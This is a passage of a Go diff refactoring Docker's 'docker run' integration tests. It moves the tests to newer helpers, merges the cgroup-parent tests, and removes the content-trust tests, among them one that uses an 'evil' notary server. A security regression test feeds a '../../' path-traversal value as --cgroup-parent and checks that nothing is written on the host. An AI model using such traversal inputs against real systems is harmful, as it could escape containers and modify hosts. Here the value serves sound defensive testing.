 	timeout := 10 * time.Second
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		timeout = 120 * time.Second
 	}
 
@@ -2838,7 +2688,7 @@ func (s *DockerSuite) TestRunContainerWithReadonlyRootfs(c *check.C) {
 	if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" {
 		testPriv = false
 	}
-	testReadOnlyFile(c, testPriv, "/file", "/etc/hosts", "/etc/resolv.conf", "/etc/hostname", "/sys/kernel", "/dev/.dont.touch.me")
+	testReadOnlyFile(c, testPriv, "/file", "/etc/hosts", "/etc/resolv.conf", "/etc/hostname")
 }
 
 func (s *DockerSuite) TestPermissionsPtsReadonlyRootfs(c *check.C) {
@@ -2926,34 +2776,27 @@ func (s *DockerSuite) TestRunVolumesFromRestartAfterRemoved(c *check.C) {
 
 // run container with --rm should remove container if exit code != 0
 func (s *DockerSuite) TestRunContainerWithRmFlagExitCodeNotEqualToZero(c *check.C) {
+	existingContainers := ExistingContainerIDs(c)
 	name := "flowers"
-	out, _, err := dockerCmdWithError("run", "--name", name, "--rm", "busybox", "ls", "/notexists")
-	if err == nil {
-		c.Fatal("Expected docker run to fail", out, err)
-	}
-
-	out, err = getAllContainers()
-	if err != nil {
-		c.Fatal(out, err)
-	}
+	cli.Docker(cli.Args("run", "--name", name, "--rm", "busybox", "ls", "/notexists")).Assert(c, icmd.Expected{
+		ExitCode: 1,
+	})
 
+	out := cli.DockerCmd(c, "ps", "-q", "-a").Combined()
+	out = RemoveOutputForExistingElements(out, existingContainers)
 	if out != "" {
 		c.Fatal("Expected not to have containers", out)
 	}
 }
 
 func (s *DockerSuite) TestRunContainerWithRmFlagCannotStartContainer(c *check.C) {
+	existingContainers := ExistingContainerIDs(c)
 	name := "sparkles"
-	out, _, err := dockerCmdWithError("run", "--name", name, "--rm", "busybox", "commandNotFound")
-	if err == nil {
-		c.Fatal("Expected docker run to fail", out, err)
-	}
-
-	out, err = getAllContainers()
-	if err != nil {
-		c.Fatal(out, err)
-	}
-
+	cli.Docker(cli.Args("run", "--name", name, "--rm", "busybox", "commandNotFound")).Assert(c, icmd.Expected{
+		ExitCode: 127,
+	})
+	out := cli.DockerCmd(c, "ps", "-q", "-a").Combined()
+	out = RemoveOutputForExistingElements(out, existingContainers)
 	if out != "" {
 		c.Fatal("Expected not to have containers", out)
 	}
@@ -3124,12 +2967,16 @@ func (s *DockerSuite) TestRunUnshareProc(c *check.C) {
 		}
 	}()
 
+	var retErr error
 	for i := 0; i < 3; i++ {
 		err := <-errChan
-		if err != nil {
-			c.Fatal(err)
+		if retErr == nil && err != nil {
+			retErr = err
 		}
 	}
+	if retErr != nil {
+		c.Fatal(retErr)
+	}
 }
 
 func (s *DockerSuite) TestRunPublishPort(c *check.C) {
@@ -3173,13 +3020,10 @@ func (s *DockerSuite) TestVolumeFromMixedRWOptions(c *check.C) {
 
 	dockerCmd(c, "run", "--name", "parent", "-v", prefix+"/test", "busybox", "true")
 
-	// TODO Windows: Temporary check - remove once TP5 support is dropped
-	if daemonPlatform != "windows" || windowsDaemonKV >= 14350 {
-		dockerCmd(c, "run", "--volumes-from", "parent:ro", "--name", "test-volumes-1", "busybox", "true")
-	}
+	dockerCmd(c, "run", "--volumes-from", "parent:ro", "--name", "test-volumes-1", "busybox", "true")
 	dockerCmd(c, "run", "--volumes-from", "parent:rw", "--name", "test-volumes-2", "busybox", "true")
 
-	if daemonPlatform != "windows" {
+	if testEnv.OSType != "windows" {
 		mRO, err := inspectMountPoint("test-volumes-1", prefix+slash+"test")
 		c.Assert(err, checker.IsNil, check.Commentf("failed to inspect mount point"))
 		if mRO.RW {
@@ -3230,6 +3074,11 @@ func (s *DockerSuite) TestRunNetworkFilesBindMount(c *check.C) {
 	filename := createTmpFile(c, expected)
 	defer os.Remove(filename)
 
+	// for user namespaced test runs, the temp file must be accessible to unprivileged root
+	if err := os.Chmod(filename, 0646); err != nil {
+		c.Fatalf("error modifying permissions of %s: %v", filename, err)
+	}
+
 	nwfiles := []string{"/etc/resolv.conf", "/etc/hosts", "/etc/hostname"}
 
 	for i := range nwfiles {
@@ -3247,6 +3096,11 @@ func (s *DockerSuite) TestRunNetworkFilesBindMountRO(c *check.C) {
 	filename := createTmpFile(c, "test123")
 	defer os.Remove(filename)
 
+	// for user namespaced test runs, the temp file must be accessible to unprivileged root
+	if err := os.Chmod(filename, 0646); err != nil {
+		c.Fatalf("error modifying permissions of %s: %v", filename, err)
+	}
+
 	nwfiles := []string{"/etc/resolv.conf", "/etc/hosts", "/etc/hostname"}
 
 	for i := range nwfiles {
@@ -3264,6 +3118,11 @@ func (s *DockerSuite) TestRunNetworkFilesBindMountROFilesystem(c *check.C) {
 	filename := createTmpFile(c, "test123")
 	defer os.Remove(filename)
 
+	// for user namespaced test runs, the temp file must be accessible to unprivileged root
+	if err := os.Chmod(filename, 0646); err != nil {
+		c.Fatalf("error modifying permissions of %s: %v", filename, err)
+	}
+
 	nwfiles := []string{"/etc/resolv.conf", "/etc/hosts", "/etc/hostname"}
 
 	for i := range nwfiles {
@@ -3281,171 +3140,6 @@ func (s *DockerSuite) TestRunNetworkFilesBindMountROFilesystem(c *check.C) {
 	}
 }
 
-func (s *DockerTrustSuite) TestTrustedRun(c *check.C) {
-	// Windows does not support this functionality
-	testRequires(c, DaemonIsLinux)
-	repoName := s.setupTrustedImage(c, "trusted-run")
-
-	// Try run
-	runCmd := exec.Command(dockerBinary, "run", repoName)
-	s.trustedCmd(runCmd)
-	out, _, err := runCommandWithOutput(runCmd)
-	if err != nil {
-		c.Fatalf("Error running trusted run: %s\n%s\n", err, out)
-	}
-
-	if !strings.Contains(string(out), "Tagging") {
-		c.Fatalf("Missing expected output on trusted push:\n%s", out)
-	}
-
-	dockerCmd(c, "rmi", repoName)
-
-	// Try untrusted run to ensure we pushed the tag to the registry
-	runCmd = exec.Command(dockerBinary, "run", "--disable-content-trust=true", repoName)
-	s.trustedCmd(runCmd)
-	out, _, err = runCommandWithOutput(runCmd)
-	if err != nil {
-		c.Fatalf("Error running trusted run: %s\n%s", err, out)
-	}
-
-	if !strings.Contains(string(out), "Status: Downloaded") {
-		c.Fatalf("Missing expected output on trusted run with --disable-content-trust:\n%s", out)
-	}
-}
-
-func (s *DockerTrustSuite) TestUntrustedRun(c *check.C) {
-	// Windows does not support this functionality
-	testRequires(c, DaemonIsLinux)
-	repoName := fmt.Sprintf("%v/dockercliuntrusted/runtest:latest", privateRegistryURL)
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", repoName)
-	dockerCmd(c, "push", repoName)
-	dockerCmd(c, "rmi", repoName)
-
-	// Try trusted run on untrusted tag
-	runCmd := exec.Command(dockerBinary, "run", repoName)
-	s.trustedCmd(runCmd)
-	out, _, err := runCommandWithOutput(runCmd)
-	if err == nil {
-		c.Fatalf("Error expected when running trusted run with:\n%s", out)
-	}
-
-	if !strings.Contains(string(out), "does not have trust data for") {
-		c.Fatalf("Missing expected output on trusted run:\n%s", out)
-	}
-}
-
-func (s *DockerTrustSuite) TestRunWhenCertExpired(c *check.C) {
-	// Windows does not support this functionality
-	testRequires(c, DaemonIsLinux)
-	c.Skip("Currently changes system time, causing instability")
-	repoName := s.setupTrustedImage(c, "trusted-run-expired")
-
-	// Certificates have 10 years of expiration
-	elevenYearsFromNow := time.Now().Add(time.Hour * 24 * 365 * 11)
-
-	runAtDifferentDate(elevenYearsFromNow, func() {
-		// Try run
-		runCmd := exec.Command(dockerBinary, "run", repoName)
-		s.trustedCmd(runCmd)
-		out, _, err := runCommandWithOutput(runCmd)
-		if err == nil {
-			c.Fatalf("Error running trusted run in the distant future: %s\n%s", err, out)
-		}
-
-		if !strings.Contains(string(out), "could not validate the path to a trusted root") {
-			c.Fatalf("Missing expected output on trusted run in the distant future:\n%s", out)
-		}
-	})
-
-	runAtDifferentDate(elevenYearsFromNow, func() {
-		// Try run
-		runCmd := exec.Command(dockerBinary, "run", "--disable-content-trust", repoName)
-		s.trustedCmd(runCmd)
-		out, _, err := runCommandWithOutput(runCmd)
-		if err != nil {
-			c.Fatalf("Error running untrusted run in the distant future: %s\n%s", err, out)
-		}
-
-		if !strings.Contains(string(out), "Status: Downloaded") {
-			c.Fatalf("Missing expected output on untrusted run in the distant future:\n%s", out)
-		}
-	})
-}
-
-func (s *DockerTrustSuite) TestTrustedRunFromBadTrustServer(c *check.C) {
-	// Windows does not support this functionality
-	testRequires(c, DaemonIsLinux)
-	repoName := fmt.Sprintf("%v/dockerclievilrun/trusted:latest", privateRegistryURL)
-	evilLocalConfigDir, err := ioutil.TempDir("", "evilrun-local-config-dir")
-	if err != nil {
-		c.Fatalf("Failed to create local temp dir")
-	}
-
-	// tag the image and upload it to the private registry
-	dockerCmd(c, "tag", "busybox", repoName)
-
-	pushCmd := exec.Command(dockerBinary, "push", repoName)
-	s.trustedCmd(pushCmd)
-	out, _, err := runCommandWithOutput(pushCmd)
-	if err != nil {
-		c.Fatalf("Error running trusted push: %s\n%s", err, out)
-	}
-	if !strings.Contains(string(out), "Signing and pushing trust metadata") {
-		c.Fatalf("Missing expected output on trusted push:\n%s", out)
-	}
-
-	dockerCmd(c, "rmi", repoName)
-
-	// Try run
-	runCmd := exec.Command(dockerBinary, "run", repoName)
-	s.trustedCmd(runCmd)
-	out, _, err = runCommandWithOutput(runCmd)
-	if err != nil {
-		c.Fatalf("Error running trusted run: %s\n%s", err, out)
-	}
-
-	if !strings.Contains(string(out), "Tagging") {
-		c.Fatalf("Missing expected output on trusted push:\n%s", out)
-	}
-
-	dockerCmd(c, "rmi", repoName)
-
-	// Kill the notary server, start a new "evil" one.
-	s.not.Close()
-	s.not, err = newTestNotary(c)
-	if err != nil {
-		c.Fatalf("Restarting notary server failed.")
-	}
-
-	// In order to make an evil server, lets re-init a client (with a different trust dir) and push new data.
-	// tag an image and upload it to the private registry
-	dockerCmd(c, "--config", evilLocalConfigDir, "tag", "busybox", repoName)
-
-	// Push up to the new server
-	pushCmd = exec.Command(dockerBinary, "--config", evilLocalConfigDir, "push", repoName)
-	s.trustedCmd(pushCmd)
-	out, _, err = runCommandWithOutput(pushCmd)
-	if err != nil {
-		c.Fatalf("Error running trusted push: %s\n%s", err, out)
-	}
-	if !strings.Contains(string(out), "Signing and pushing trust metadata") {
-		c.Fatalf("Missing expected output on trusted push:\n%s", out)
-	}
-
-	// Now, try running with the original client from this new trust server. This should fail because the new root is invalid.
-	runCmd = exec.Command(dockerBinary, "run", repoName)
-	s.trustedCmd(runCmd)
-	out, _, err = runCommandWithOutput(runCmd)
-
-	if err == nil {
-		c.Fatalf("Continuing with cached data even though it's an invalid root rotation: %s\n%s", err, out)
-	}
-	if !strings.Contains(out, "could not rotate trust to a new trusted root") {
-		c.Fatalf("Missing expected output on trusted run:\n%s", out)
-	}
-}
-
 func (s *DockerSuite) TestPtraceContainerProcsFromHost(c *check.C) {
 	// Not applicable on Windows as uses Unix specific functionality
 	testRequires(c, DaemonIsLinux, SameHostDaemon)
@@ -3543,48 +3237,23 @@ func (s *DockerSuite) TestRunContainerWithCgroupParent(c *check.C) {
 	// Not applicable on Windows as uses Unix specific functionality
 	testRequires(c, DaemonIsLinux)
 
-	cgroupParent := "test"
-	name := "cgroup-test"
+	// cgroup-parent relative path
+	testRunContainerWithCgroupParent(c, "test", "cgroup-test")
 
-	out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup")
-	if err != nil {
-		c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err)
-	}
-	cgroupPaths := parseCgroupPaths(string(out))
-	if len(cgroupPaths) == 0 {
-		c.Fatalf("unexpected output - %q", string(out))
-	}
-	id, err := getIDByName(name)
-	c.Assert(err, check.IsNil)
-	expectedCgroup := path.Join(cgroupParent, id)
-	found := false
-	for _, path := range cgroupPaths {
-		if strings.HasSuffix(path, expectedCgroup) {
-			found = true
-			break
-		}
-	}
-	if !found {
-		c.Fatalf("unexpected cgroup paths. Expected at least one cgroup path to have suffix %q. Cgroup Paths: %v", expectedCgroup, cgroupPaths)
-	}
+	// cgroup-parent absolute path
+	testRunContainerWithCgroupParent(c, "/cgroup-parent/test", "cgroup-test-absolute")
 }
 
-func (s *DockerSuite) TestRunContainerWithCgroupParentAbsPath(c *check.C) {
-	// Not applicable on Windows as uses Unix specific functionality
-	testRequires(c, DaemonIsLinux)
-
-	cgroupParent := "/cgroup-parent/test"
-	name := "cgroup-test"
+func testRunContainerWithCgroupParent(c *check.C, cgroupParent, name string) {
 	out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup")
 	if err != nil {
 		c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err)
 	}
-	cgroupPaths := parseCgroupPaths(string(out))
+	cgroupPaths := ParseCgroupPaths(string(out))
 	if len(cgroupPaths) == 0 {
 		c.Fatalf("unexpected output - %q", string(out))
 	}
-	id, err := getIDByName(name)
-	c.Assert(err, check.IsNil)
+	id := getIDByName(c, name)
 	expectedCgroup := path.Join(cgroupParent, id)
 	found := false
 	for _, path := range cgroupPaths {
@@ -3603,49 +3272,12 @@ func (s *DockerSuite) TestRunInvalidCgroupParent(c *check.C) {
 	// Not applicable on Windows as uses Unix specific functionality
 	testRequires(c, DaemonIsLinux)
 
-	cgroupParent := "../../../../../../../../SHOULD_NOT_EXIST"
-	cleanCgroupParent := "SHOULD_NOT_EXIST"
-	name := "cgroup-invalid-test"
+	testRunInvalidCgroupParent(c, "../../../../../../../../SHOULD_NOT_EXIST", "SHOULD_NOT_EXIST", "cgroup-invalid-test")
 
-	out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup")
-	if err != nil {
-		// XXX: This may include a daemon crash.
-		c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err)
-	}
-
-	// We expect "/SHOULD_NOT_EXIST" to not exist. If not, we have a security issue.
-	if _, err := os.Stat("/SHOULD_NOT_EXIST"); err == nil || !os.IsNotExist(err) {
-		c.Fatalf("SECURITY: --cgroup-parent with ../../ relative paths cause files to be created in the host (this is bad) !!")
-	}
-
-	cgroupPaths := parseCgroupPaths(string(out))
-	if len(cgroupPaths) == 0 {
-		c.Fatalf("unexpected output - %q", string(out))
-	}
-	id, err := getIDByName(name)
-	c.Assert(err, check.IsNil)
-	expectedCgroup := path.Join(cleanCgroupParent, id)
-	found := false
-	for _, path := range cgroupPaths {
-		if strings.HasSuffix(path, expectedCgroup) {
-			found = true
-			break
-		}
-	}
-	if !found {
-		c.Fatalf("unexpected cgroup paths. Expected at least one cgroup path to have suffix %q. Cgroup Paths: %v", expectedCgroup, cgroupPaths)
-	}
+	testRunInvalidCgroupParent(c, "/../../../../../../../../SHOULD_NOT_EXIST", "/SHOULD_NOT_EXIST", "cgroup-absolute-invalid-test")
 }
 
-// TestRunInvalidCgroupParent checks that a specially-crafted cgroup parent doesn't cause Docker to crash or start modifying /.
-func (s *DockerSuite) TestRunAbsoluteInvalidCgroupParent(c *check.C) {
-	// Not applicable on Windows as uses Unix specific functionality
-	testRequires(c, DaemonIsLinux)
-
-	cgroupParent := "/../../../../../../../../SHOULD_NOT_EXIST"
-	cleanCgroupParent := "/SHOULD_NOT_EXIST"
-	name := "cgroup-absolute-invalid-test"
-
+func testRunInvalidCgroupParent(c *check.C, cgroupParent, cleanCgroupParent, name string) {
 	out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup")
 	if err != nil {
 		// XXX: This may include a daemon crash.
@@ -3654,15 +3286,14 @@ func (s *DockerSuite) TestRunAbsoluteInvalidCgroupParent(c *check.C) {
 
 	// We expect "/SHOULD_NOT_EXIST" to not exist. If not, we have a security issue.
 	if _, err := os.Stat("/SHOULD_NOT_EXIST"); err == nil || !os.IsNotExist(err) {
-		c.Fatalf("SECURITY: --cgroup-parent with /../../ garbage paths cause files to be created in the host (this is bad) !!")
+		c.Fatalf("SECURITY: --cgroup-parent with ../../ relative paths cause files to be created in the host (this is bad) !!")
 	}
 
-	cgroupPaths := parseCgroupPaths(string(out))
+	cgroupPaths := ParseCgroupPaths(string(out))
 	if len(cgroupPaths) == 0 {
 		c.Fatalf("unexpected output - %q", string(out))
 	}
-	id, err := getIDByName(name)
-	c.Assert(err, check.IsNil)
+	id := getIDByName(c, name)
 	expectedCgroup := path.Join(cleanCgroupParent, id)
 	found := false
 	for _, path := range cgroupPaths {
@@ -3783,8 +3414,8 @@ func (s *DockerSuite) TestRunLoopbackOnlyExistsWhenNetworkingDisabled(c *check.C
 
 // Issue #4681
 func (s *DockerSuite) TestRunLoopbackWhenNetworkDisabled(c *check.C) {
-	if daemonPlatform == "windows" {
-		dockerCmd(c, "run", "--net=none", WindowsBaseImage, "ping", "-n", "1", "127.0.0.1")
+	if testEnv.OSType == "windows" {
+		dockerCmd(c, "run", "--net=none", testEnv.PlatformDefaults.BaseImage, "ping", "-n", "1", "127.0.0.1")
 	} else {
 		dockerCmd(c, "run", "--net=none", "busybox", "ping", "-c", "1", "127.0.0.1")
 	}
@@ -4030,23 +3661,19 @@ func (s *DockerSuite) TestRunWrongCpusetMemsFlagValue(c *check.C) {
 // TestRunNonExecutableCmd checks that 'docker run busybox foo' exits with error code 127'
 func (s *DockerSuite) TestRunNonExecutableCmd(c *check.C) {
 	name := "testNonExecutableCmd"
-	runCmd := exec.Command(dockerBinary, "run", "--name", name, "busybox", "foo")
-	_, exit, _ := runCommandWithOutput(runCmd)
-	stateExitCode := findContainerExitCode(c, name)
-	if !(exit == 127 && strings.Contains(stateExitCode, "127")) {
-		c.Fatalf("Run non-executable command should have errored with exit code 127, but we got exit: %d, State.ExitCode: %s", exit, stateExitCode)
-	}
+	icmd.RunCommand(dockerBinary, "run", "--name", name, "busybox", "foo").Assert(c, icmd.Expected{
+		ExitCode: 127,
+		Error:    "exit status 127",
+	})
 }
 
 // TestRunNonExistingCmd checks that 'docker run busybox /bin/foo' exits with code 127.
 func (s *DockerSuite) TestRunNonExistingCmd(c *check.C) {
 	name := "testNonExistingCmd"
-	runCmd := exec.Command(dockerBinary, "run", "--name", name, "busybox", "/bin/foo")
-	_, exit, _ := runCommandWithOutput(runCmd)
-	stateExitCode := findContainerExitCode(c, name)
-	if !(exit == 127 && strings.Contains(stateExitCode, "127")) {
-		c.Fatalf("Run non-existing command should have errored with exit code 127, but we got exit: %d, State.ExitCode: %s", exit, stateExitCode)
-	}
+	icmd.RunCommand(dockerBinary, "run", "--name", name, "busybox", "/bin/foo").Assert(c, icmd.Expected{
+		ExitCode: 127,
+		Error:    "exit status 127",
+	})
 }
 
 // TestCmdCannotBeInvoked checks that 'docker run busybox /etc' exits with 126, or
@@ -4054,34 +3681,32 @@ func (s *DockerSuite) TestRunNonExistingCmd(c *check.C) {
 // as that's when the check is made (and yes, by its design...)
 func (s *DockerSuite) TestCmdCannotBeInvoked(c *check.C) {
 	expected := 126
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		expected = 127
 	}
 	name := "testCmdCannotBeInvoked"
-	runCmd := exec.Command(dockerBinary, "run", "--name", name, "busybox", "/etc")
-	_, exit, _ := runCommandWithOutput(runCmd)
-	stateExitCode := findContainerExitCode(c, name)
-	if !(exit == expected && strings.Contains(stateExitCode, strconv.Itoa(expected))) {
-		c.Fatalf("Run cmd that cannot be invoked should have errored with code %d, but we got exit: %d, State.ExitCode: %s", expected, exit, stateExitCode)
-	}
+	icmd.RunCommand(dockerBinary, "run", "--name", name, "busybox", "/etc").Assert(c, icmd.Expected{
+		ExitCode: expected,
+		Error:    fmt.Sprintf("exit status %d", expected),
+	})
 }
 
 // TestRunNonExistingImage checks that 'docker run foo' exits with error msg 125 and contains  'Unable to find image'
+// FIXME(vdemeester) should be a unit test
 func (s *DockerSuite) TestRunNonExistingImage(c *check.C) {
-	runCmd := exec.Command(dockerBinary, "run", "foo")
-	out, exit, err := runCommandWithOutput(runCmd)
-	if !(err != nil && exit == 125 && strings.Contains(out, "Unable to find image")) {
-		c.Fatalf("Run non-existing image should have errored with 'Unable to find image' code 125, but we got out: %s, exit: %d, err: %s", out, exit, err)
-	}
+	icmd.RunCommand(dockerBinary, "run", "foo").Assert(c, icmd.Expected{
+		ExitCode: 125,
+		Err:      "Unable to find image",
+	})
 }
 
 // TestDockerFails checks that 'docker run -foo busybox' exits with 125 to signal docker run failed
+// FIXME(vdemeester) should be a unit test
 func (s *DockerSuite) TestDockerFails(c *check.C) {
-	runCmd := exec.Command(dockerBinary, "run", "-foo", "busybox")
-	out, exit, err := runCommandWithOutput(runCmd)
-	if !(err != nil && exit == 125) {
-		c.Fatalf("Docker run with flag not defined should exit with 125, but we got out: %s, exit: %d, err: %s", out, exit, err)
-	}
+	icmd.RunCommand(dockerBinary, "run", "-foo", "busybox").Assert(c, icmd.Expected{
+		ExitCode: 125,
+		Error:    "exit status 125",
+	})
 }
 
 // TestRunInvalidReference invokes docker run with a bad reference.
@@ -4091,8 +3716,8 @@ func (s *DockerSuite) TestRunInvalidReference(c *check.C) {
 		c.Fatalf("expected non-zero exist code; received %d", exit)
 	}
 
-	if !strings.Contains(out, "Error parsing reference") {
-		c.Fatalf(`Expected "Error parsing reference" in output; got: %s`, out)
+	if !strings.Contains(out, "invalid reference format") {
+		c.Fatalf(`Expected "invalid reference format" in output; got: %s`, out)
 	}
 }
 
@@ -4101,15 +3726,10 @@ func (s *DockerSuite) TestRunInitLayerPathOwnership(c *check.C) {
 	// Not applicable on Windows as it does not support Linux uid/gid ownership
 	testRequires(c, DaemonIsLinux)
 	name := "testetcfileownership"
-	_, err := buildImage(name,
-		`FROM busybox
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
 		RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
 		RUN echo 'dockerio:x:1001:' >> /etc/group
-		RUN chown dockerio:dockerio /etc`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+		RUN chown dockerio:dockerio /etc`))
 
 	// Test that dockerio ownership of /etc is retained at runtime
 	out, _ := dockerCmd(c, "run", "--rm", name, "stat", "-c", "%U:%G", "/etc")
@@ -4165,15 +3785,8 @@ func (s *DockerSuite) TestRunVolumesMountedAsShared(c *check.C) {
 
 	// Convert this directory into a shared mount point so that we do
 	// not rely on propagation properties of parent mount.
-	cmd := exec.Command("mount", "--bind", tmpDir, tmpDir)
-	if _, err = runCommand(cmd); err != nil {
-		c.Fatal(err)
-	}
-
-	cmd = exec.Command("mount", "--make-private", "--make-shared", tmpDir)
-	if _, err = runCommand(cmd); err != nil {
-		c.Fatal(err)
-	}
+	icmd.RunCommand("mount", "--bind", tmpDir, tmpDir).Assert(c, icmd.Success)
+	icmd.RunCommand("mount", "--make-private", "--make-shared", tmpDir).Assert(c, icmd.Success)
 
 	dockerCmd(c, "run", "--privileged", "-v", fmt.Sprintf("%s:/volume-dest:shared", tmpDir), "busybox", "mount", "--bind", "/volume-dest/mnt1", "/volume-dest/mnt1")
 
@@ -4215,25 +3828,15 @@ func (s *DockerSuite) TestRunVolumesMountedAsSlave(c *check.C) {
 
 	// Convert this directory into a shared mount point so that we do
 	// not rely on propagation properties of parent mount.
-	cmd := exec.Command("mount", "--bind", tmpDir, tmpDir)
-	if _, err = runCommand(cmd); err != nil {
-		c.Fatal(err)
-	}
-
-	cmd = exec.Command("mount", "--make-private", "--make-shared", tmpDir)
-	if _, err = runCommand(cmd); err != nil {
-		c.Fatal(err)
-	}
+	icmd.RunCommand("mount", "--bind", tmpDir, tmpDir).Assert(c, icmd.Success)
+	icmd.RunCommand("mount", "--make-private", "--make-shared", tmpDir).Assert(c, icmd.Success)
 
 	dockerCmd(c, "run", "-i", "-d", "--name", "parent", "-v", fmt.Sprintf("%s:/volume-dest:slave", tmpDir), "busybox", "top")
 
 	// Bind mount tmpDir2/ onto tmpDir/mnt1. If mount propagates inside
 	// container then contents of tmpDir2/slave-testfile should become
 	// visible at "/volume-dest/mnt1/slave-testfile"
-	cmd = exec.Command("mount", "--bind", tmpDir2, path.Join(tmpDir, "mnt1"))
-	if _, err = runCommand(cmd); err != nil {
-		c.Fatal(err)
-	}
+	icmd.RunCommand("mount", "--bind", tmpDir2, path.Join(tmpDir, "mnt1")).Assert(c, icmd.Success)
 
 	out, _ := dockerCmd(c, "exec", "parent", "cat", "/volume-dest/mnt1/slave-testfile")
 
@@ -4255,11 +3858,10 @@ func (s *DockerSuite) TestRunNamedVolumeCopyImageData(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 
 	testImg := "testvolumecopy"
-	_, err := buildImage(testImg, `
+	buildImageSuccessfully(c, testImg, build.WithDockerfile(`
 	FROM busybox
 	RUN mkdir -p /foo && echo hello > /foo/hello
-	`, true)
-	c.Assert(err, check.IsNil)
+	`))
 
 	dockerCmd(c, "run", "-v", "foo:/foo", testImg)
 	out, _ := dockerCmd(c, "run", "-v", "foo:/foo", "busybox", "cat", "/foo/hello")
@@ -4274,32 +3876,61 @@ func (s *DockerSuite) TestRunNamedVolumeNotRemoved(c *check.C) {
 	dockerCmd(c, "run", "--rm", "-v", "test:"+prefix+"/foo", "-v", prefix+"/bar", "busybox", "true")
 	dockerCmd(c, "volume", "inspect", "test")
 	out, _ := dockerCmd(c, "volume", "ls", "-q")
-	c.Assert(strings.TrimSpace(out), checker.Equals, "test")
+	c.Assert(strings.TrimSpace(out), checker.Contains, "test")
 
 	dockerCmd(c, "run", "--name=test", "-v", "test:"+prefix+"/foo", "-v", prefix+"/bar", "busybox", "true")
 	dockerCmd(c, "rm", "-fv", "test")
 	dockerCmd(c, "volume", "inspect", "test")
 	out, _ = dockerCmd(c, "volume", "ls", "-q")
-	c.Assert(strings.TrimSpace(out), checker.Equals, "test")
+	c.Assert(strings.TrimSpace(out), checker.Contains, "test")
 }
 
 func (s *DockerSuite) TestRunNamedVolumesFromNotRemoved(c *check.C) {
 	prefix, _ := getPrefixAndSlashFromDaemonPlatform()
 
 	dockerCmd(c, "volume", "create", "test")
-	dockerCmd(c, "run", "--name=parent", "-v", "test:"+prefix+"/foo", "-v", prefix+"/bar", "busybox", "true")
+	cid, _ := dockerCmd(c, "run", "-d", "--name=parent", "-v", "test:"+prefix+"/foo", "-v", prefix+"/bar", "busybox", "true")
 	dockerCmd(c, "run", "--name=child", "--volumes-from=parent", "busybox", "true")
 
+	cli, err := client.NewEnvClient()
+	c.Assert(err, checker.IsNil)
+	defer cli.Close()
+
+	container, err := cli.ContainerInspect(context.Background(), strings.TrimSpace(cid))
+	c.Assert(err, checker.IsNil)
+	var vname string
+	for _, v := range container.Mounts {
+		if v.Name != "test" {
+			vname = v.Name
+		}
+	}
+	c.Assert(vname, checker.Not(checker.Equals), "")
+
 	// Remove the parent so there are not other references to the volumes
 	dockerCmd(c, "rm", "-f", "parent")
 	// now remove the child and ensure the named volume (and only the named volume) still exists
 	dockerCmd(c, "rm", "-fv", "child")
 	dockerCmd(c, "volume", "inspect", "test")
 	out, _ := dockerCmd(c, "volume", "ls", "-q")
-	c.Assert(strings.TrimSpace(out), checker.Equals, "test")
+	c.Assert(strings.TrimSpace(out), checker.Contains, "test")
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), vname)
 }
 
 func (s *DockerSuite) TestRunAttachFailedNoLeak(c *check.C) {
+	// TODO @msabansal - https://github.com/moby/moby/issues/35023. Duplicate
+	// port mappings are not errored out on RS3 builds. Temporarily disabling
+	// this test pending further investigation. Note we parse kernel.GetKernelVersion
+	// rather than system.GetOSVersion as test binaries aren't manifested, so would
+	// otherwise report build 9200.
+	if runtime.GOOS == "windows" {
+		v, err := kernel.GetKernelVersion()
+		c.Assert(err, checker.IsNil)
+		build, _ := strconv.Atoi(strings.Split(strings.SplitN(v.String(), " ", 3)[2][1:], ".")[0])
+		if build == 16299 {
+			c.Skip("Temporarily disabled on RS3 builds")
+		}
+	}
+
 	nroutines, err := getGoroutineNumber()
 	c.Assert(err, checker.IsNil)
 
@@ -4335,14 +3966,9 @@ func (s *DockerSuite) TestRunVolumeWithOneCharacter(c *check.C) {
 
 func (s *DockerSuite) TestRunVolumeCopyFlag(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Windows does not support copying data from image to the volume
-	_, err := buildImage("volumecopy",
-		`FROM busybox
+	buildImageSuccessfully(c, "volumecopy", build.WithDockerfile(`FROM busybox
 		RUN mkdir /foo && echo hello > /foo/bar
-		CMD cat /foo/bar`,
-		true,
-	)
-	c.Assert(err, checker.IsNil)
-
+		CMD cat /foo/bar`))
 	dockerCmd(c, "volume", "create", "test")
 
 	// test with the nocopy flag
@@ -4378,26 +4004,30 @@ func (s *DockerSuite) TestRunDNSInHostMode(c *check.C) {
 
 	expectedOutput := "nameserver 127.0.0.1"
 	expectedWarning := "Localhost DNS setting"
-	out, stderr, _ := dockerCmdWithStdoutStderr(c, "run", "--dns=127.0.0.1", "--net=host", "busybox", "cat", "/etc/resolv.conf")
-	c.Assert(out, checker.Contains, expectedOutput, check.Commentf("Expected '%s', but got %q", expectedOutput, out))
-	c.Assert(stderr, checker.Contains, expectedWarning, check.Commentf("Expected warning on stderr about localhost resolver, but got %q", stderr))
+	cli.DockerCmd(c, "run", "--dns=127.0.0.1", "--net=host", "busybox", "cat", "/etc/resolv.conf").Assert(c, icmd.Expected{
+		Out: expectedOutput,
+		Err: expectedWarning,
+	})
 
 	expectedOutput = "nameserver 1.2.3.4"
-	out, _ = dockerCmd(c, "run", "--dns=1.2.3.4", "--net=host", "busybox", "cat", "/etc/resolv.conf")
